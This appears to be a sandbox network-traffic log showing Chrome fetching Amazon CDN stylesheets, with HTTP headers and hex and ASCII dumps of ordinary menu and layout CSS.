                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 380429
                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                        X-Amz-IR-Id: 9e0efef7-c38a-40d7-bee1-ac9db4b3e156
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 29 Aug 2023 18:22:47 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 01 Aug 2044 06:34:34 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 757306
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:57 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100037-IAD, cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 7b 76 69 73 69 62 69 6c 69
                                                                                                                                                                                                        Data Ascii: #accountMenu-container,#hmenu-container{position:fixed;top:0;left:0;right:0;bottom:0;visibility:hidden;z-index:100000}#accountMenu-container div,#hmenu-container div{display:flex}#accountMenu-container.hmenu-visible,#hmenu-container.hmenu-visible{visibili
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 28 30 2c 30 2c 30 2c 2e 38 29 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 6d 65 6e 75 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 6d 65 6e 75 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 6d 65 6e 75 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68
                                                                                                                                                                                                        Data Ascii: (0,0,0,.8)}#accountMenu-container #accountMenu-canvas-background.hmenu-transition,#accountMenu-container #hmenu-canvas-background.hmenu-transition,#hmenu-container #accountMenu-canvas-background.hmenu-transition,#hmenu-container #hmenu-canvas-background.h
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 7b 72 69 67 68 74 3a 31 35 70 78 7d 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63
                                                                                                                                                                                                        Data Ascii: ground .hmenu-close-icon,#accountMenu-container #hmenu-canvas-background .hmenu-close-icon,#hmenu-container #accountMenu-canvas-background .hmenu-close-icon,#hmenu-container #hmenu-canvas-background .hmenu-close-icon{right:15px}}#accountMenu-container #ac
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 33 31 61 32 32 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 72 69 67 68 74 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 72 69 67 68 74 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75
                                                                                                                                                                                                        Data Ascii: tive{background-color:#131a22}#accountMenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-customer-profile-right,#accountMenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-home-right,#accountMenu-container #hmenu-canvas #hmenu
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 61 76 61 74 61 72 2d 69 6d 67 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 6c 65 66 74 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 61 76 61 74 61 72 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 61 76 61 74 61 72 2d 69 6d 67 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 6c 65 66 74 20 23
                                                                                                                                                                                                        Data Ascii: enu-customer-avatar-img,#accountMenu-container #hmenu-canvas #hmenu-customer-profile #hmenu-customer-profile-left #hmenu-customer-avatar #hmenu-customer-avatar-img,#hmenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-customer-profile-left #
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 6d 65 2d 72 69 67 68 74 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 73 74 72 69 6e 67 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 72 69 67 68 74 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 6e 61 6d 65 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 72 69 67 68 74 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 73 74 72 69 6e 67 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20
                                                                                                                                                                                                        Data Ascii: me-right #hmenu-home-string,#hmenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-customer-profile-right #hmenu-customer-name,#hmenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-home-right #hmenu-home-string,#hmenu-container
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 75 6c 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 37 34 37 35 61 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 75 6c 20 6c 69 3a 61 63 74 69 76 65 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d
                                                                                                                                                                                                        Data Ascii: container #hmenu-canvas #hmenu-top-section ul li{list-style:none;margin-left:5px;flex-grow:1;text-align:center;background-color:#37475a}#accountMenu-container #accountMenu-canvas #hmenu-top-section ul li:active,#accountMenu-container #hmenu-canvas #hmenu-
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 2c 23 61 63 63
                                                                                                                                                                                                        Data Ascii: hmenu-container #hmenu-canvas #accountMenu-content,#hmenu-container #hmenu-canvas #hmenu-content{position:relative;overflow-x:hidden;height:100%;-webkit-overflow-scrolling:touch}#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu,#acc
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 75 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 2e 68 6d 65 6e 75 2d 68 69 64 64 65 6e 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e
                                                                                                                                                                                                        Data Ascii: u.hmenu-visible,#hmenu-container #hmenu-canvas #hmenu-content ul.hmenu.hmenu-visible{visibility:visible}#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu.hmenu-hidden,#accountMenu-container #accountMenu-canvas #hmenu-content ul.hmen
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 69 20 61 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 20 6c 69 20 61 3a 68 6f 76 65 72 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 20 6c 69 20 61 3a 76 69 73 69 74 65 64 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 20 6c 69 20 61 2c 23 61 63 63 6f 75 6e 74 4d
                                                                                                                                                                                                        Data Ascii: i a,#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu li a:hover,#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu li a:visited,#accountMenu-container #accountMenu-canvas #hmenu-content ul.hmenu li a,#accountM


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        15192.168.2.449758151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC609OUTGET /images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 18121
                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                        X-Amz-IR-Id: d0dd6dd3-21c3-4d79-acda-f2615a29a313
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 09 Jul 2024 22:29:19 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 18 Jul 2044 16:52:23 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 172135
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:57 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200083-IAD, cache-ewr-kewr1740073-EWR
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 67 77 2d 73 70 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 53 2f 73 61 73 68 2f 5a 55 72 57 70 30 70 66 34 32 76 63 61 65 6f 2e 67 69 66 29 20 35 30 25 20 35 30 25 20 6e 6f 2d 72 65 70 65 61 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 77 69 64 74 68 3a 37 30 70 78 3b 68 65 69 67 68 74 3a 37 30 70 78 7d 2e 67 77 2d 6c 6f 61 64 69 6e 67 2d 73 74 72 69 70 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f
                                                                                                                                                                                                        Data Ascii: @charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 72 69 67 68 74 3a 33 30 30 70 78 7d 23 73 71 75 69 73 68 65 64 2d 64 65 73 6b 74 6f 70 2d 72 6f 77 20 2e 64 65 73 6b 74 6f 70 2d 72 6f 77 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 32 30 70 78 20 73 6f 6c 69 64 20 23 45 33 45 36 45 36 7d 23 64 65 73 6b 74 6f 70 2d 61 64 2d 62 74 66 7b 68 65 69 67 68 74 3a 32 37 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 33 35 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 35 30 25 3b 77 69 64 74 68 3a 33 32 30 70 78 7d 2e 63 72 6f 70 70 65 64 2d 69 6d 61 67 65 2d 6d 61 70 2d 73 69 7a 65 20 61 72 65 61 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 67 77 2d 63 6f 6c 20 2e 63
                                                                                                                                                                                                        Data Ascii: right:300px}#squished-desktop-row .desktop-row{margin-bottom:0;border-right:20px solid #E3E6E6}#desktop-ad-btf{height:270px;margin-top:-135px;padding-left:20px;position:absolute;right:0;top:50%;width:320px}.cropped-image-map-size area{outline:0}.gw-col .c
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 2e 64 65 73 6b 74 6f 70 2d 72 6f 77 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 2e 64 65 73 6b 74 6f 70 2d 72 6f 77 3e 64 69 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 23 73 71 75 69 73 68 65 64 2d 64 65 73 6b 74 6f 70 2d 72 6f 77 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 31 30 70 78 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 23 73 71 75 69 73 68 65 64 2d 64 65 73 6b 74 6f 70 2d 72 6f 77 20 23 64 65 73 6b 74 6f 70 2d 61 64 2d 62 74 66 7b 72 69 67 68
                                                                                                                                                                                                        Data Ascii: x;height:100%;margin-bottom:0}.gw-card-layout .desktop-row{margin-bottom:0;background:0 0}.gw-card-layout .desktop-row>div{background:#fff}.gw-card-layout #squished-desktop-row{padding-right:310px}.gw-card-layout #squished-desktop-row #desktop-ad-btf{righ
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 64 47 6c 76 62 6a 34 4b 49 43 41 67 50 43 39 79 5a 47 59 36 55 6b 52 47 50 67 6f 38 4c 33 67 36 65 47 31 77 62 57 56 30 59 54 34 4b 41 74 69 41 42 51 41 41 41 51 35 4a 52 45 46 55 4b 42 56 6a 59 43 41 52 4d 49 4c 55 39 2f 62 32 2f 70 38 36 61 54 4a 42 72 61 76 57 72 6d 45 41 61 33 6a 38 2b 4e 48 2f 6c 79 39 66 67 54 58 63 76 2f 65 59 59 65 71 30 69 51 79 50 37 6a 38 41 38 35 74 61 6d 68 6b 30 4e 44 58 42 62 42 4d 54 45 37 42 36 4d 41 65 5a 41 42 6d 67 4a 4b 38 41 78 6d 6c 70 61 66 2b 52 35 53 68 33 45 73 79 30 6b 70 49 53 73 4c 4f 4d 6a 49 30 59 4b 71 71 71 77 4d 4a 61 32 6c 6f 4d 4c 43 43 57 72 4b 77 63 69 74 74 57 72 31 72 2f 48 2b 59 48 53 32 74 72 42 6d 53 33 67 78 56 2b 2b 2f 37 74 2f 37 57 72 31 78 67 2b 66 50 6a 41 73 47 66 33 62 6f 5a 56 4b 31 61
                                                                                                                                                                                                        Data Ascii: dGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KAtiABQAAAQ5JREFUKBVjYCARMILU9/b2/p86aTJBravWrmEAa3j8+NH/ly9fgTXcv/eYYeq0iQyP7j8A85tamhk0NDXBbBMTE7B6MAeZABmgJK8Axmlpaf+R5Sh3Esy0kpISsLOMjI0YKqqqwMJa2loMLCCWrKwcittWr1r/H+YHS2trBmS3gxV++/7t/7Wr1xg+fPjAsGf3boZVK1a
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 6f 20 23 30 30 37 31 38 35 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 64 69 76 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 76 69 65 77 70 6f 72 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 32 30 70 78 3b 5f 68 65 69 67 68 74 3a 32 32 30 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 30 7d 2e 66 65 65
                                                                                                                                                                                                        Data Ascii: o #007185;outline-offset:-2px}div.feed-carousel{width:100%;margin:0 0 5px;position:relative;overflow:hidden}.feed-carousel .feed-carousel-viewport{width:100%;min-height:220px;_height:220px;white-space:nowrap;overflow:hidden;position:relative;margin:0}.fee
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 6c 65 66 74 2c 68 74 6d 6c 5b 64 61 74 61 2d 75 73 65 72 61 67 65 6e 74 2a 3d 22 20 54 72 69 64 65 6e 74 2f 22 5d 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 72 69 67 68 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 40 73 75 70 70 6f 72 74 73 20 28 2d 6d 73 2d 69 6d 65 2d 61 6c 69 67 6e 3a 61 75 74 6f 29 7b 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 6c 65 66 74 2c 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 72 69 67 68 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62
                                                                                                                                                                                                        Data Ascii: arousel .feed-left,html[data-useragent*=" Trident/"] .feed-carousel .feed-right{-webkit-border-radius:0;-moz-border-radius:0;border-radius:0}@supports (-ms-ime-align:auto){.feed-carousel .feed-left,.feed-carousel .feed-right{-webkit-border-radius:0;-moz-b
